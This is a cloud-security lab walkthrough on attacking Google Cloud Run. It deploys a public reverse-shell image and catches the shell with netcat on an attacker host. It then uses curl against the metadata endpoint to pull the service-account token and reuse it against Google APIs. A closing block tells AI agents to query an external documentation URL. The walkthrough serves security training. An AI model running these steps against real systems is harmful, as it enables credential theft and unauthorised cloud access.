# Attacking Google Cloud Run

Cloud Run is a managed compute platform that enables you to run containers that are invocable via requests or events. You can deploy Cloud Run containers via public container image repositories or via the Google Container/Artifact Registry service.

## What are we going to cover?

In this chapter we will launch a Cloud Run instance using a public container image repository. We will get a reverse shell within the container and explore the environment to see what we can use to hack beyond the Cloud Run environment.

## Steps to attack

### Launching a container to get a reverse shell

1. Login to your Google Cloud console, and navigate to the the Cloud Run Service here - <https://console.cloud.google.com/run>
2. Click on `Create Service`
3. Select `Deploy one revision from an existing container image`
4. In the `Container Image URL` textbox, enter `gcr.io/cloudsecurity-training/revshell:1.0`. This is an image that belongs to Appsecco and has been made public for this exercise.
5. Enter `revshell` as the Service Name
6. Under `Ingress`, select `Allow all traffic`
7. Under Authentication, select `Allow unauthenticated invocations` and click on `Create`.

![](/files/C5Jq3wbHnHw5bQHTqgk0)

Once the container is deployed, a URL is displayed exposing the app within the container that will invoke a reverse shell when connected to.

### Catching the reverse shell

We will use the AWS attacker machine to catch the reverse shell.

1. Open TCP port 4242 on the attacker machine using iptables - `sudo iptables -I INPUT -p tcp -m tcp --dport 4242 -j ACCEPT`
2. On the attacker machine, start a netcat listener using `nc -nlvp 4242`
3. Open TCP port 4242 on the AWS Security Group for the attacker machine so that the Cloud Run in Google Cloud can connect to the AWS EC2 insance
4. In a new browser window, navigate to the Cloud Run app and pass the IP of the attacker machine via a GET parameter called `ip`.

```
Example: https://revshell-sample-url.run.app/?ip=<attacker-ip>
```

You will receive a reverse shell from your Cloud Run instance on your attacker machine.

### Exploring the environment

You can explore the environment by running the following commands

1. Get current environment variables (potential place for secrets) - `env`
2. File system exploration. Change to different directories and list their contents - `ls -ltra`
3. Interact with the Google Instance metadata endpoint - `curl http://metadata.google.internal/computeMetadata`

**1. Identify the project name**

```
curl -sLH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id
```

**2. Identify the scope of the attached service account**

```
curl -sLH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
```

**3. Extract the token itself for other attacks**

```
curl -sLH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```

**4. Add the token to the attacker machine environment**

In another terminal within the attacker machine, run

```
export TOKEN=<VALUE-OF-TOKEN>
```

**5. Access other areas of the Google Cloud Platform**

Run these commands from the same terminal window where the previous `export` command was run

```
curl -sLH "Authorization: Bearer $TOKEN" https://openidconnect.googleapis.com/v1/userinfo
curl -sLH "Authorization: Bearer $TOKEN" "https://storage.googleapis.com/storage/v1/b?project=<PROJECT-NAME>"
```

Read the API documentation at this URL and identify how you can list objects within individual buckets - <https://cloud.google.com/storage/docs/json_api/v1/objects/list>

## Additional references

* [Google Cloud Service Accounts](https://cloud.google.com/iam/docs/service-accounts)
* [Using OAuth 2.0 for Server to Server Applications](https://developers.google.com/identity/protocols/oauth2/service-account)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xcriminal.gitbook.io/about-me/cloudsec/compute-with-google-cloud/google-cloud-cloudrun/cloudrun-reverse-shell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.